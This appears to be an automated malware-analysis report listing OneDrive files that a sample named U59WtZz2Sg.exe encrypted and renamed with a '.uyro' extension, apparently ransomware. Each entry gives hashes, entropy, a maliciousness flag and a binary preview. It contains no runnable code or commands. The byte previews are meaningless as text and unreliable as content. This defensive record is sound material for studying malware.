H.]k..>..J..28`.>.iD0.....rF...............w.if.o...5..!w...(9.S.L.y...........@....R..T.N.$....T1..w...(...._.......Q(....m.A...0]..(.c7..t.....v.....7.....7.nd.......(....{@.Y.'e8.qi.0..Q.t-...d..../..5}P.$.\|.......l.^.....Z...[A...{B..A..$.f;"O..S.e..,.9@...6p.9...-.V....&.....=\|Y..4[..=.;...!j.t...Gk..R..9]x.n...O.....T8k..Z.J.iX`p.4m\...i...^.F4fT.].JS.._2.a;...fQ.....U..H....7l..E/..:.L..8d..Xv.s...s`0..hc......o.<.J{.3...?..l..).u.V.DM..53.Q.-U@54...U........l..n...N%q...s=..y...rQ.Ox8-....1...........1uc..E...E....bA.m.'.5i.......f.<...!}]_qI.....FFY>Q\|}Q".*.J.:..}G..L..../..6s..ie.;.vk0.......

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\KFMLockedFileToast.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	12516
Entropy (8bit):	7.984822736508687
Encrypted:	false
SSDEEP:	192:97LjES3565IuqobXyjVgZ3kJgDrwKUwbkR2nU+42abU6:93j1VgDyJgnD//S2np4dP
MD5:	33A719C5DFDA42DD94D337B860D61323
SHA1:	69705D5441B233357B590DE7D4E57800F15F3927
SHA-256:	C49985722D43CC0FEF9EB0DB84238F5D1AA72237C43F3A59D3CD84180A1C61AB
SHA-512:	D01F803F2415A70B803C7E00E4457B1235C4BA815D16D1BF4A874AF8C248A943F63E6742F8F72A9D351EC711EA335D19194E4FD5787067041316B0B9E49B156C
Malicious:	false
Reputation:	unknown
Preview:	.PNG..x[.q...;.5J....K..Y..&....3TwA... .`d.re..&&YQ..dT....[.`..4n../.k..w{>+...n0k(E....XQd....@GN...S..$.....+s..t#m...L......X&..^..?L..p.tp..A.....8..HW.P...n.U_KZ..N...w...........m.I(].....Scx..1....e.h..$.O+4.@...d.<.A.C.....+.4.a...!...b{%.\..Q..*.. ....zA../..-.......gF...e~^.X.7...@..M7.......{r..<..6.@.z.....".[..3..;n.<Y.X........61WJ.M.~Mx.w5...ay;...v..w.~.w.7..v.<.=.. ....8.D'....n.I..`....?AB3....'.E..w7Py..m.9...0H~.........A.....b..]..$U.h2.3.....X..1I.7.:.Q.......@Z"..2....3.g.P..5..3...-.G.4=-.=..SW..l4.K.wp..c+..._.Yc,.+...kKU...;..J....n.f>2=.~.t......D.........=6.u.H.....v....c...-'o5..-.K~+.%...2^....8.#.......x;..9u.....!..\......"../8.....~E.}..Y6[.v-$....8......Bm.>N .;(....-.....}.yQ.c]1.....>.>......@.....@B.....# .[...7M.:[.=.....6..vx....Gh.i.ZB<F>....>.{...._Iu4.......".$.....U.&.g..2.v..t...w(....z32.t.uz.O.....{Y&....SY4.....e....! .x...j.../v+}..m..@.......wv[.y.Ez...TR]..{.I..Sn;..GPd...}..

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\KFMScanExclusionToast.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	10886
Entropy (8bit):	7.98359054804433
Encrypted:	false
SSDEEP:	192:f1Ev6XZDRnOUZUMPps3ltxVsJ6XnkmjEFEsHkmJe6u9vfaaRsWe1i38Sd:9+e9OOb+VLXn7jpHmJNWHaa7e1isSd
MD5:	52AA56A046AD5EB4FB0F8F8025467A5E
SHA1:	2375C53D3431FB5CDF6E0516980225A99439E0DB
SHA-256:	27ABF4C748E329466365F092D3033EDDD6EF8C0CC779ED6E6C1D5EBF62592100
SHA-512:	DCEB0A3EBCBF9A7DDF7D628D533B50D11D34D929BC0962E339F4A87FD5A64A4D05A303916D1D53BA7556EA064826801A842D8662A1FE5375AE58395FA1133729
Malicious:	false
Reputation:	unknown
Preview:	.PNG....;"...v.......B...p...........b..5F.h.xMU.u+....j.wN.}g....V.Wzs.%po..e..r.n...0M.P.6..@.u..#...G......X.1X.4..z.Zn..U.....p.p.KE..B....s.../2L.jx(.....d..U..\|.[..0![.....;Y..y.OPC...~.-...X....v.o.......Jc...t..u.....p.;}.\|@5...!6_.h.k.QBK...W.n.0........V..:=>?..0.R!(..Ri...?^...j0.H.....Q........,.2..LLF\|~.1....\|..]s.......N.(#...C.Gp.e..3Z$S...p..I..)k1..s...:d".B....=#.B.7.4........}..,P/..YF.vP.s...-....M......z..lx.(N....6H...(..;....m..G=m.....Ghs.3..=J..`%...f.-....F...Y.....)...t.,.....7v..n...O..<..}.Kh0.OuQ.-..eU.\.....0%.<~m....;i..]..5.Wm.t..V.\.q..K.!]..:Y..J+..FC./...........*....K.....D.. .N....E-S2.C^.....'.b#.yQ.}.\.=.....B\....J.....f..]b...an..T......k.T@......<.,.....)~.......k[............5;.ez.1.M...$.`.'.....".u.Ox.Py&..}..h`..4..._<]>.......1....qsn.....j<.-F..\U.....v}.7Pr.-.9....im..2.K.....z...c.tE...7....fh.....\|f...MR!....Ib..J...\.WN..3.L.nX..a.O...xy~...+Z._.T.2..0W.......$q..U.%.....d.UU.

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\LoadingPage.html.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6734
Entropy (8bit):	7.973754753921928
Encrypted:	false
SSDEEP:	96:tn2z4Ee+CWJBGdvjWbIXEbbNhWLtA6UahySlPWGvqXywu0Hs9Oe+mXK:tn2zZTwNXwb25XUahTlOsqXy+Hs9vFa
MD5:	D6FF5E608AF4DDDAB9414D087BE8175F
SHA1:	26376B4E4F3188D8DADE0FD553B8E98614C314C4
SHA-256:	7679B07392185CD136E95A67D4CADBA6E80787B732FAB1A02707309A705EAC0E
SHA-512:	EE7974C5CE9DA80B7B0A532BC2EDEA988815F2DA14DDBF5B3EB3524D8330F948356A0B2E900CAB3972FFF386A80FF37388459BE5A4797AB5CC8AE572F8466999
Malicious:	false
Reputation:	unknown
Preview:	<!DOC_.pZ.p.Pi.t>.}... ....\|.W.0...GU.&.TFau.Z...........x..}.%.....}z....R.p...`....,{.p..V...Y.v...p-9y3Q...X.JuPS..&..j..Fe.j...2Q.....E..6h.2XJ......N..b.........A..js.Rp.P...Q..[.Kb....b*Fs.9F.d...W..0.w.\H.GfKg...GV./..~.A6%..G...ba..T.K.b..c...0.D.U..&.mj. ...l'.fbPrV........er...Q.L.......Vg...@}..#.p8u...P....i\|..-..D.....i..I..R....;....8..S...]-..2.......I...ju..z"A#\|d..0Z"=..7...E.{..'>....B.=,.>Y.}.~.6.6Ze.&8zX..P<..Qq.+{..6...I.. ..m.j.'..#.+..p..=;.t.........V..Y..&y...V;..V.......:......<.....m..:.f.6..........D6....s.QS.j.6&......31..0R.G,,...^.,S..Q9..P<..l..9AP(@....Qm.i.F.s...!C.Y!..(..%.....T.....^.v~......#.'b....... ...<tJO..y....R.D.\|E.`........{........&mk..".....dX..y.c.v...s._:0.2.."j.t8Gi....##.^...-...k..c.ja7.h..$B.p. .2.P<......jj...%h.....7../?:v....`M].,.v...`..+._..w...Dux...".y/.I...]DR.<q.....7..X.....0.....8......,~..c..i"......Q..a..` ..i.[...".......U..pQ.f.p{..9x/.nZ...........OA.$.U`S...U.b..\.%

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDrive.VisualElementsManifest.xml.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	678
Entropy (8bit):	7.6539685045020915
Encrypted:	false
SSDEEP:	12:it3rOc6keqUg2z2QtLk6WpcLvCCda9lBIx3u0R2ZzgA6XUvrntaLYtcii9a:SrSkeY2zJC65vCeOlCQuhXUZa6bD
MD5:	38DD3EE868DD3376294A97357D6EA7C0
SHA1:	476C592324EBA820C59B3E22102D99B237676965
SHA-256:	0119A827F7A6C850DC973A6ABFCC4D0AAFE7B6A83215EF5055F53763FFBC2712
SHA-512:	9C34F958583AA00B1BA0232E69DF284CCD51C9C5C465AF9E7E4E456A9AC2E4BE233105E60DFF5BC503581CBECC676E166F5EE2C96E75E11AE273795A80AF3CD0
Malicious:	false
Reputation:	unknown
Preview:	<?xml..g....\|<....].{zo......#wJ.PVn.d.j...,...j....Ev....J&..Y...+~..B..>.....t....hJ...L5Z\...(..M...;'....y..V.ZR.B...G`......,....P%.....!..ch.?U...R.Q..c...8>zr...J.mp....x..>z.f...2.......[...RO.<Ep.`t@..fgsHA.......?.......d.gd.9...!..E..f..\...+d.sB...wvQ..&g.....&cW.Ub)khK..=V^.z....w.Y..%..`_.9...xU(...[.K.p7......N..V#..uH.....4D......K0....5..X.`=-.x..3A...G.\...ze..r.Q.......Ok7G.r._0F.Z........,..d#...]".F.\|..4.T..l.Q...s:F.z......vN......$..w.....ZV2....,....$....qL.....!.i..1.rM..N0.~O....Q9....E&...q....$!..........}.m.:y..c>p.7{...\|aw.?o...eK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	1586822
Entropy (8bit):	4.596503395828359
Encrypted:	false
SSDEEP:	12288:FgOVLbjrll9THaYAIRhZ0obpXMaAZQoEKwIFrE8pfU:FgA3jx3rZ0oyxnEjIhEU8
MD5:	679A164756356BF1CE597346CCCC96B7
SHA1:	F705E214B2E66362A58B2344841645DEE41D21BE
SHA-256:	3407867A977B6CA9A6C1B4A0F7B60E36C6F63F4240C0BD3081E99913178AC0BC
SHA-512:	C2CFC8735264A4FF8193B18D8DCB8937ADFB7DFAC1DEF5BF5ADCF22BF507FA5DFA4670060504DBDBBB399A5527337769053D047A4E5C4127B2C7D3758BD7ABC2
Malicious:	true
Reputation:	unknown
Preview:	MZ...g(:3.E.A$..........Z`..S.w.X.?....(\|.d.~...._....m..3..v.."...d.X\|.!.,...SI.~S..Q.M.....@.#&&......k..'.c..H...>...q}....yI&v.%..................n.7../&..k.&]..Z..."%.5a.4_....SS.]...aM..p.e.1:.N..@.T..U....yB'C...\.V.....$....._..VV O.Y,[..R.j..G...$...tZ..........i....?..Y.L1f^.&.]...3...$..D.2....r..<..]..../1.9._i...FEqOZ.0...Fd...".h`.m89.w.+.\)..3..<..~Lx..0.h.p...45>7....&.....{.y....#.)\|.f'.=...._.f..a.;..Y#.1...+..1..!}...y.........!K.Q.0;....6..Q ..-.(J.a...?.t......0......_0....Y.0"....@..m.(-..).4........y.$../J.OE...k..v.~.A......4.p6.)_......hJ......A?.s.......;.>...LT.."..x...@....2m9.\3F.N..>4\].B#.'.{.c.R\]O..'&P...'bU.i....JRZ....N.3..."J.....f`.ab..ro...s...y...8. .......s....d.W@.S^\..........e!.....`..}/g.M.....{..b$...^.s.N.z...H..j&.........`~=-vO..A....S....$.Ez..a.K...Y..gC...B.......`#.s..'.....`.V.....".98n..p..*...k..E.m<.....e.,...b1^^.".^...X.h..4..~.ZY...X.l.$.&..`W}..1'K.!V....u..{...

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveLogo.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5859
Entropy (8bit):	7.970514378724054
Encrypted:	false
SSDEEP:	96:Vsz+fbALbgmh4YniK6UicR5OCAPDHp1LBVfRmvFFEisA4riQrVVkfbDGTSar3LY:Vsz+fbcboTe5NAPDHppBV5rA47wf3GT4
MD5:	F69B24EE7075C94B407323AE12C9D1F6
SHA1:	7B2BA838F336BFC90DAD16735CF187F80A3576B3
SHA-256:	8350D453A6799A607E3AFA379B9277FC0937A9F64DCBFF5FD4E618F37A9C78E2
SHA-512:	B8932EA3F338B89ED0037BE626A8DCB7BBAC8B46B3E2A79910B2C6CC58E282221487FE2EED0EC3AC4EB6F57E47ED39AD75031365ED1BC7A11254BEDBEAA142F6
Malicious:	false
Reputation:	unknown
Preview:	.PNG....8...n...E...`.T\|...ft.##..M.~....Q..._.....Bo..N.4.A..5....l........ps..&...G.y.#...!.....1.iA..._&..i.....xh.E..>.z...D.M.J.....1..y....... >.r.HK.&Ku..N..r....Lej.l;zV..GD.`b..Re..E......~.n\..87.K.=..+..:...+...?>.E.S...ka...k.....[Uc..[L.....j..>.....p..H....:..0.R(..(.}G.q@9a..q1^j`..._c...[.W......._.].t.......>>c....-;..._.I.h..'...W.j.m.y.S..<h"IV...J.$.....#&.'.>E0E%t.Z ./?.v....%.&..:5Y.^>....zZ./.E....@.e4..............d^"k.DJ..k,2.!$...`d.7..6EB.H._r......7$....,_19z...b8..=..#+..&b...v.P.S.G>...6.....$..tI..Rj4......_t.f.iM.R._q..`...o6....ns...,.X"...C..5.\|[.\'0.....H.+Hu......q.l`.2.....R.(d.\...\.pV..H'.-.Q.g6...........'.m.s.Q...N..Q.3......!]r...gR5(.:.7.. .@..y..yTJ7@..B.2-zR.A.5;....0.W%....g`...........S....`J<..0.....6.X..}..R.._W....u..9>..vl.VXA.,.zJ.^....v.'....L.{p..x....*l.....I...[.t.X...............9E_......kzHdm....."...QnN?..J.k.\........L..7$u...3.x.1.O.%B..&Y\+!.mv.f#..v...7.l...Tu....T.1&.x..A..

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	33147014
Entropy (8bit):	7.93712145977963
Encrypted:	false
SSDEEP:	786432:QSyGYVG6gFyUWzAM2f+4n6RDjLXES+YSFIl37zmJaggZ:Q+XAUWt10QjLU8SFIlryJm
MD5:	5E0F454FF9E847276DEDD42A4560EED3
SHA1:	9CA1A91646BFC34A787BE7D7143BED2EB862762E
SHA-256:	CF77F2C7FDF8C962581629574FDF58273713ED440E7E7118C32E8E0839DB610D
SHA-512:	8A7AC721B9FC036D8EB0DE23D4C222C3120CD2597779E1940B58954EB937B82C630AF21285EA1826FF9A9B7B591AFEFFBEEF1A3689ADAF4F5A3AC186A6796A13
Malicious:	true
Reputation:	unknown
Preview:	MZ.....IYP7.qqD.9...\.W(.i`/ .y...l..F...?.]^.n'.e...3. .Z.....9..!.`.K~.dC...{.^...G...t...!AD..8.....3y.bx..0,4...sa.C3..j...j..5....&w0Q..}9.....y9.<./(...i.-z`...........;.yR.p.N..6.^..a.CU.m.:.@`.u1.W.x!...._=.[.R`.LQ......s...{...3..}..+."......_Z=..XB...[........+.pv.i...)..i.)4...n.....?......Kus?...g.y...............J...IE....JQ.O.:UI.(5...}j......Uw\<.4....4,YG...t..hg...(....AL4$6...M....rzMKD...!..EZ .w.;1...D.+K.\|..K..9H..@}..)..X./F.....J. ...Rs.3I.....[..~MI.....C..g&.Z...[c........J...)V.;....A.HK...x...%gl...a>)..:..1j...r..f.i....g.6....m2V.n..;I...<..%..N... .w.f.........I...iIz.Y..,......G..,...[P....].:R4......N......P?...^..^.6.IA..i...(.8....">{..C..._(d.....n...v.?%M.j....=W.(..a.a.....mHDy....9.v#V..9.$.).AEx:..{"=r.C...4...>3;.?!.su$0.c.5.9..?..wLd.r.......f..d.....g@.\|..3..O...#.L.$.....9..l....i.O...a..v....i..&.._..bb....Cy.YI....b.}{..5...g25..}....Oh..-.T..-....i...s...#.d....Z..F.G4..;w..UD.3.Z...

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2544558
Entropy (8bit):	6.805243069446418
Encrypted:	false
SSDEEP:	49152:HLBMIFOLkC9SkGVcuFHkry4momPf5yD/boFFYCyosGMD1wDb5SToIjjKEQY5XW:HltOLkCgTVcDry4mbeC/R
MD5:	9FF45E2EDD05CCC6FA1A9570E30A3F87
SHA1:	2F6B9F41FB1EE98FB7E0127DE2620ABF042DC487
SHA-256:	FE62AF2C8E680D35CFC8CB63352B85B25F2185D43FEC106F61DC272CA7A9EE51
SHA-512:	3E444E4F034595D964C1BABD99AE0840EE984A7F93ED9F6D76CA2EFDB19C64FDBBB9B655820F7FEDAC47F4408CCBF018B741708559452104762B15936FD0140F
Malicious:	true
Reputation:	unknown
Preview:	MZ......li...v...b......8.AB....I.V.....:.E.j...S...fU}.....t...._.....(u.K..Zb^W..Y5.....6N....;....W.iJb.@...^...[tc....`....UV<.45y;..b...B...P!.n..<....VN7..[.1B...W.+....b8...^...H.=\|...Yk..&...+K8."F...z.nC.l..4.P.=hO.Hl.k.w.@.\|x.&BP...J.+.....t....N#@.pm.H.5...(E..0.69..M..C...[$.?1....y...7D.&......B_..T..qv.Bc..\|ei)M..4..w_..vw.hkbb0T?x.F...%O./!^..h.....Q.2.b.~.H2.....^^.)...HZ...\ .........n......R)....h^7...].t.o...J,..+?...3....c@.=.F..[s.Z.........{t-...#~a...88.s.....>..]a.D...b.zj(..G^.c..Fp.................<R.dzz.S..B9..W.}.d.;A\|.....@......@...k<.....0...N.t.T..A.U...e5.)^.m..7.pB...Y...D=..Ow1....h..M.Q..1..[.j.+....~.6qi.......B..m.oJ0.y".....dJ.X.....h..l..DX...Vvj.g...Jr...:MD.e3.....=Dc.<#...S..ug/....\.....jYk.....$..O.T .....Q....u...,.X)C.@?.!k...._.z..~1a.Q.H......S+.ZL8.PS.{...W.=.gi.xQ..T..B.%....}...1.y.%.(.",.SA'md.C..}..Wu.0.&....a....jU...1.-.p....I-...g....f.....D,...b;.....\|..s._.........n./Lo...s.....

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2391686
Entropy (8bit):	6.847723781160483
Encrypted:	false
SSDEEP:	49152:EFrloWkZazjAqD8YMptDqEkhjBQh/ydRDpoeezMG9eaPMo6+y7D1zWO4VTIIk+P0:6HAqD8NDjkBmeezMG9vPMx+38
MD5:	04F986379A63B9EFE054F271A975CBD5
SHA1:	8AF06CB66F9639C76BD2D3132131C1B12FEC13E9
SHA-256:	86A919DA9FD807AFC685A375205DD81B1D7D792CE9218770B0944631D80121E0
SHA-512:	633ABFBA80DF5BFB1B990F319CF9280FAA20518793AC59CB2E773FE394BD4A05C08EF925D108123312699C4A8DB9DEAFF1CE7ABA98E39B9BEE16FA863D1A47DF
Malicious:	true
Reputation:	unknown
Preview:	MZ....."..X.kh.F...IBL..+.uw.M..U.'...;.o.L.7.D.2.#IB....d...&-F....<.H.. [.r...&....O$..?.;.W...;.H..,#k./p..?o..."..'.S.8...sq.t.~.W!!....<....x..jb.XY.Y.6.`N.-.ygIy0...??F.F.5HI H..S/.{.m}..<a.Mm}.1..v.T).........2../0..>....wOdq.a.%QP0.U....R8.^.ju.Uq.F....Y.....M...G.h;.b.)..a..X....D..-".(:k...>W{.......![....zqH.w.9..9+..}.h7h4...K...y@.....8.?-d.........v..-....E)q.(M.\.]\W.Na".X.j.R.Z.b....C.?....%a.....og.G..... .....4.L l.....J.....cD....)9..3.l..MNN..,oU...x:.D....W)BQ.....l{..p.3.h4..]..%.l....C.#.E...};5.y.MZh.%.f.....h.R%...\......_......c.....v.... ...1\|BKF/..`..h.c.-...X.4@...\|DW.....Ker....x...9.L/....E}m....................z...W.,.fm....bMb(^...!...O..S...F....P...A8T)...w&.u..)....j-..2.,.X..O....c.t&.F^D..9").Y.. .\..,...........R..\.....h"f..K....rt.....W.#@G.D.%...s..g..I.,..8./_...<S4../......B.. .w{..V^R.b....KP@.I+...b...".eE.r...K..l.ow...l.(5m^.c...jI\|\..R./R~..@.sb...98.v...ATbI+.F.w.7~WV....b.q.@......:0.O

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\QuotaCritical.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5012
Entropy (8bit):	7.964957585881485
Encrypted:	false
SSDEEP:	96:IyURsdT4uYintd4HFM8Tbr5O9En7SMrxAR0hgfWUaW+kv042ba:y4tnKFbH5r0AgeqKO
MD5:	A2E464757FF445BFAB819403949AFBBC
SHA1:	E018B17E2018ECAA89B2D1A3CDB96612641FC577
SHA-256:	B3D446BDD9AA4073687B742A482E85C7C1F1F5388979F50DEDB25E2C5B7BE6F3
SHA-512:	520681D52054DCE2FD1100F79667FEAA718205B576DBD4F3229D96E64287BF66BEA237746491DA155EB4D191BF55F0C63F217FF1603CA03DD256CFAFD08FDE6E
Malicious:	false
Reputation:	unknown
Preview:	.PNG..@,v..).7g.Ig%u..I".nK....`..CP..G).#LB..5V....X...O.=^xG}?..Q.d.]sD.?\|....St.!E$.^..S.9.....=s... X....,.E>.&.ha0.\..2..,.i..7..x.O.X^.c......}.{.O...%....-..lob.Sk.^...5".y.n....a.....].?..(...~g.Xd.z7....:.N~Ho....f....gf............XS0.t..,."...Z#...#...2..4.....d.. ..-._....2\|Q.O........V..d.-.3.d+i?..,..j.Hd...P.U$e......qU4...,~p1._`4............K....sJe.j....._,cZ..N.D..z.........#...T.BQJ.....&......}>jp.(..;.W.V...M..M...6$...0.....K....s...$...n....d.jl,k..'Z.=.O.......I..!..vw.2..-......L..K..\|.M&Id@..U..}..iU4K=l.o.\|6.]...;..f...D.4...F....n........X..W."..B.F.C..k...@o..H.j..E:pQ..&G...u..I...a.%...,W.._..K...N.&t...EF.)!......iY.ls.Z....k.i..$bo.....}.U"j"2../..V..I.g.+L.J...9O.+y./B.+K..8+.o.%......%...O..j...0.`2..gN..l....\...1....N.kw......?44H..*.v..rlC./.b...M.+.p.j.n..?....&...{.iuV..X.6C......t...Ck.XIG.>s..=.[iz.,...u..9..XN.?..z.{...S0.9B..[=..`..(.o.^.Z..H=.A._....7......h.}...P......3H..z...@J...K.4p.8.Ir.

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\QuotaError.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5102
Entropy (8bit):	7.972607956825478
Encrypted:	false
SSDEEP:	96:ELcKYvnBCK3I/GQEebWljCxG+/yPsdqv4++r0Ni8h64jMpDOTn:ELcPn/Y/VmjCuC6NHpMhOTn
MD5:	660797566324797B0224D9E628E35050
SHA1:	47BC0984253589609542ECAC30550942EF7C8F17
SHA-256:	A1DC6B52903B92427C1E9D33B861AB940F5AFB271A7A5DF619878012C764059C
SHA-512:	F619BC9016C384B06BF5E623A47A0FF160F96879DE361B1D746571C03B9F504E1020B1D904D6FA5E506EC1003E0C4A20689A9FF576EC0598BE55F9F1C133337A
Malicious:	false
Reputation:	unknown
Preview:	.PNG..vz........'..G....!.]k.3.v.KK......=......).(h..uhI...O.{.f./-.o..~P..?y.....[...e.....FQgS7. }..../.zx3.1#....=...V...{...^".....%..M:k.G.^...s?.JEWj@M.0.A.4J.O.x..%V@#......T&&..E#..j....y.(..a....f7.~.y"c$..fa.6..Ny...LV. .......o}...Cq....]<..R................Q....4...!c.F...3.....`.....O..".?.....{./.j{.....</...\|7jdg.(.@5.wB....<.ME.... .".41...^Y......q{..V.F..w...Kc.T....d~.a..nw.1.V...B.l...ZK.X/.%].r7.O~..`-....t.......MM...2T.y*.......1J..t.s.{bl......M...L.ui;.p.I?......v.D.:-GXJ.K...Y.Ko4.B..............T\.R.8..}.H........\1.N^...k....1.....}.\|..d~.....v9.:.NX9.=.I4....u...G.>f2...X.E.. .A32....\|..r3.u.-1.I...U!\|..%.5........'...%.f.X...{......0.}......W.....&.n..U.J..F.y%.X.C...g..Y...?@......$..Qt+.P.o....D..#.......M.;.~..u..T.J.93F.. '.........(.J....#t....g..:)w5.b..\|H!X.).........W..L..W.".(b.......la+.<...'[.H.......o..a...&.........[.Y]m.X90`-.....N...r0,6.0.r.+.k.C&n..jz.....].w...z.&4.s.$"..N..._.gK.2..

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\QuotaNearing.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4158
Entropy (8bit):	7.953892523911852
Encrypted:	false
SSDEEP:	96:C3q5RPZKRLZU80pGBzuqP5sNnOht6BqyzAYCJflbHSB:C3QRPV80YBzuqP5sNnW6BqMAzlBHu
MD5:	27E3348AE02E3C4C88AF3BB492599B21
SHA1:	7FD9C0A6D5AE39DDB1231462B7D726D2F305E09C
SHA-256:	F3415E3AD232ACC9882E8421CAE3A878C9217B19C30A03A3CF2E2820F53C855A
SHA-512:	9FF09F3A503EA1B56DCB395276817E0F96943035A4D7B47839F2FAE3F7715AE69CADE6FA7AFAFAC5613A892370338656ED7CB34CE385FC86C0DBF6DD6C5F88C0
Malicious:	false
Reputation:	unknown
Preview:	.PNG...v..Vj...2.d.Mf...v.......z@[pX.......A.L..:EY.&.P.GS{.}......)ET......1.A}..7.R.\|.p{..q.y..."xX.S.s..+F.]u.j.}2..w......8s.._......z....I..e..XM..{.....TmO....]..y..e@...{..c..wWso..l.j.u.....Y.s....(.1...&...\|..9Z..L.).....vU...]g..cz..~. .YU.Lu.y.......d(.`...s....t..`g.v..Dn.r-...B...G...C..c.T..$1..z....y3....St.:?....0!.\|.....G.t.^..q.%3..eEZ.H... ..Z.....c3...IX.t.....9..;.....Ns.K..#..sx..Q.C.z..q.s..:......~.?0R.'....CpU.\|.uE....BQ1i..g..z\......r... .06.....3..3[.5h..]........8....../)..L......... ...4..2...^>.4DP J..1..n.r.J2Z..M..ZI..n.)M....1..i Z..j.".m......X..g.x[b..b..t..d.c<...0.=c..B1........!=.T^..........R...3~)....w!..*.....{....x.............9...L6..s.A.].5....,...../....F...%..%!...T....j@.4........vL.V....... K.._..>.~.6.5.S.........Pu=.%tq...\9iD..%..".q.1x..m.g...89M.-.]je..; m"..A....&..=R.)X..>..F..Jt..t.J...1.):`.7.%k3<t..X..hbW.%.S..W8\.{..@$..rq.g....d...Jl....T..e...Q@v..a%./...K..5SN..A>.12.

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\Resources.pri.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4750
Entropy (8bit):	7.960760929899719
Encrypted:	false
SSDEEP:	96:WaB2lnrjhbLHJPYjinZGxNO/Gfqoi/DkXJiT3PFBuP:W3rJzdys0oWZWDk4T98
MD5:	F8221D645372200EF8A2E8AD528B6945
SHA1:	B78E271E35915F21F8BC5E9FDC8D675D5C334723
SHA-256:	38A8C16C43C09BB89E310EB91126F7E0E36BB8A66835F8385B79CCF02926966D
SHA-512:	1E5DC3DF32259D9940CF1673BEF649A6EE9C4F2C45B1AA5FFAB51BE4C1A22627178301210FC5EFDDD52ED3C299A1EB89E2400B043FDA8B45DE289FE146287AD7
Malicious:	false
Reputation:	unknown
Preview:	mrm_p.k.-..ign.5.......%V..W..T.%..%..&......./c;...2........8h.M..`t).s...u.`.%...d+..d\g.._=.m....H.....Y...........li....^.s...5..........2.......#O.......11!suQ....w.%s.b....k."..E..q..d...G...!.._k.h.X"..a.J?d.m.C,......)......W.c. ).k.f=I...H)7g..TB.N.)30...........'...y@....4......8.Bf..F..Sv.wTV.1.c..zB.s.....Q...W.B..\......u..'w.H...t....&f..x..7. ....[..x;.Q...r.6.vQ...`.......<3.[......e..r.......y...0.c..Uw......cN..\|...:..#.^..Z...f..Q...92...yZq...L..o..[..{\...\|.u....=.4.e..6..i..R.....^>9./..e.....\|Ukj.N[..&...V...D......j64.J...0t.....M.CZ)..+p.d..... .bz..(.W.A.C....Z..l..{..<v.UN>..F.Z._...j".s..2+w.....ED.2...$k}..D......{4..a..4C.q..i.e2.u.....9~..i..C&ai..:)n.....\|..8.p..z>...FO.........I.....'.."...#..x...uz...`..........4A..\|..'.....1.U1...)...h0....$..?y.....b...-.E.v5.sB..6.e0/...e.U.b..L4y.sS.O>\.....&.a..B)..<#p....v"..\|..8..d......6....F...8.D!8...i...$.#.......e....S.g$w...V\.5....3.Q.....4.....

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\SaveApplicationEventLogs.wsf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1827
Entropy (8bit):	7.885110763143544
Encrypted:	false
SSDEEP:	48:f0eRgh6oeejy/7h2mJfiBm7luu6MI7DUgD:ceRc6oZSIBm7luuu7DU8
MD5:	0054BCEBB45C1C01B9F0A50684872322
SHA1:	34ACA3033832B16516FC87C61AC8EF311E6162E7
SHA-256:	D5196F2B8B7B61721F0951A692BC5869E5B51ACAC570330C07322A9202D70562
SHA-512:	2A30FF57F6229DCD9402E7010FC5EEFB7729C103789C066AC5778458260C9A1BD9AF60528889A2010B5D8428479F6482F632F852C35294A31F6F40B73531678F
Malicious:	false
Reputation:	unknown
